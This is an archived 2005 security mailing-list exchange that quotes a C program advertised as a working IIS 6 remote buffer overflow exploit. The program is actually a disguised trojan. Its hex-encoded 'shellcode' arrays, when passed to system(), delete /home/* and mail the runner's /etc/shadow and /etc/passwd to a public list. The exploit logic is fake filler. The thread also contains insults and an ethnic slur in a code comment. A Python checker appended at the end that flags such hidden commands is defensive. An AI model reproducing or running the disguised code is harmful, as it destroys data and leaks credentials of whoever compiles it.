Message-ID: <20050420215757.36486.qmail@web60901.mail.yahoo.com>
Date: Wed Apr 20 22:58:03 2005
From: d4yj4y at yahoo.com (Day Jay)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Yes it is you hat squad lamer newbie. Now get it to work!! You fucking newbie.
You're so lame and so is your file system.
--- "class101@...-SQUAD.com" <class101@...-squad.com> wrote:
> perfect asshole
>
> -------------------------------------------------------------
> class101
> Jr. Researcher
> Hat-Squad.com
> -------------------------------------------------------------
> ----- Original Message -----
> From: "Day Jay" <d4yj4y@...oo.com>
> To: <full-disclosure@...ts.grok.org.uk>
> Sent: Wednesday, April 20, 2005 8:15 PM
> Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
>
>
> > Sorry, the previous code was broken. This code should work...
> >
> > Happy Owning!! :)
> >
> >
> > =========SNIP============
> > /* Proof of concept code
> > Please don't send us e-mails
> > asking us "how to hack" because
> > we will be forced to skullfsck you.
> >
> > DISCLAIMER:
> > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> >
> > IIS 6 Buffer Overflow Exploit
> >
> > BUG: inetinfo.exe improperly bound checks
> > http requests sent longer than 6998 chars.
> > Can get messy but enough testing, and we have
> > found a way in.
> >
> > VENDOR STATUS: Notified
> > FIX: In process
> >
> > Remote root.
> >
> > eg.
> > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > + Connecting to host...
> > + Connected.
> > + Inserting Shellcode...
> > + Done...
> > + Spawining shell..
> >
> > Microsoft Windows XP [Version 5.1.2600]
> > (C) Copyright 1985-2001 Microsoft Corp.
> > C:\
> >
> >
> >
> > */
> > char shellcode[] =
> > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > "\x68\x65\x68\x65";
> >
> > char launcher [] =
> > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> > char netcat_shell [] =
> > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> >
> > main()
> > {
> >
> > file://Section Initialises designs implemented by
> mexicans
> > file://Imigrate
> > system(launcher);
> > system(netcat_shell);
> > system(shellcode);
> >
> > file://int socket = 0;
> > file://double long port = 0.0;
> >
> > file://#DEFINE port host address
> > file://#DEFINE number of inters
> > file://#DEFINE gull eeuEE
> >
> > // for(int j; j < 30; j++)
> > {
> > file://Find socket remote address fault
> > printf(".");
> > }
> > file://overtake inetinfo here IIS_666666^
> > return 0;
> > }
> >
> > __________________________________________________
> > Do You Yahoo!?
> > Tired of spam? Yahoo! Mail has the best spam protection around
> > http://mail.yahoo.com
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
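Added example, not part of the original message or thread: a static check a reader can run over a posted proof of concept like the one quoted above before compiling it, decoding each `\x`-escaped char array and reporting any that turn out to be printable text handed to `system()`. The function names, the 0.95 threshold and the embedded C sample are assumptions constructed for this illustration.

```python
import re

# Matches: char name[] = "..." "..." ;  (adjacent C string literals)
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
SYSTEM_CALL_RE = re.compile(r'\bsystem\s*\(\s*(\w+)\s*\)')


def decode_arrays(source):
    """Return {array_name: bytes} for every char array built from \\xNN escapes."""
    arrays = {}
    for name, literals in ARRAY_RE.findall(source):
        body = "".join(LITERAL_RE.findall(literals))
        arrays[name] = bytes(int(h, 16) for h in HEX_ESCAPE_RE.findall(body))
    return arrays


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII; real machine code scores low."""
    if not data:
        return 0.0
    return sum(0x20 <= b <= 0x7E for b in data) / len(data)


def audit(source, threshold=0.95):
    """List (name, text) for arrays that decode to text and are passed to system()."""
    executed = set(SYSTEM_CALL_RE.findall(source))
    findings = []
    for name, data in decode_arrays(source).items():
        if name in executed and printable_ratio(data) >= threshold:
            findings.append((name, data.decode("ascii", "replace")))
    return findings


# Constructed sample, not taken from any real post: one array hides a harmless
# shell command, the other holds non-text bytes and is never executed.
SAMPLE = r'''
char shellcode[] =
"\x65\x63\x68\x6f\x20"
"\x68\x65\x6c\x6c\x6f";
char blob[] = "\x90\x90\xcc\xeb\xfe";
main() { system(shellcode); return 0; }
'''

if __name__ == "__main__":
    for name, text in audit(SAMPLE):
        print(f"{name} is passed to system() and decodes to: {text!r}")
```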